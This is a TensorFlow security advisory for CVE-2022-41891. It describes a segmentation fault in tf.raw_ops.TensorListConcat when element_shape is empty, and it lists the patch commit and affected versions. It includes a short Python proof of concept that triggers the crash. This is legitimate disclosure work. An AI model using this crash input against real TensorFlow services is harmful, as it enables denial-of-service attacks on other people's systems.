## TFSA-2022-154: Segfault in `tf.raw_ops.TensorListConcat`

### CVE Number
CVE-2022-41891

### Impact
If [`tf.raw_ops.TensorListConcat`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/kernels/list_kernels.h) is given `element_shape=[]`, it results segmentation fault which can be used to trigger a denial of service attack.
```python
import tensorflow as tf
tf.raw_ops.TensorListConcat(
    input_handle=tf.data.experimental.to_variant(tf.data.Dataset.from_tensor_slices([1, 2, 3])),
    element_dtype=tf.dtypes.float32,
    element_shape=[]
)
```

### Patches
We have patched the issue in GitHub commit [fc33f3dc4c14051a83eec6535b608abe1d355fde](https://github.com/tensorflow/tensorflow/commit/fc33f3dc4c14051a83eec6535b608abe1d355fde).

The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Tong Liu, ShanghaiTech University
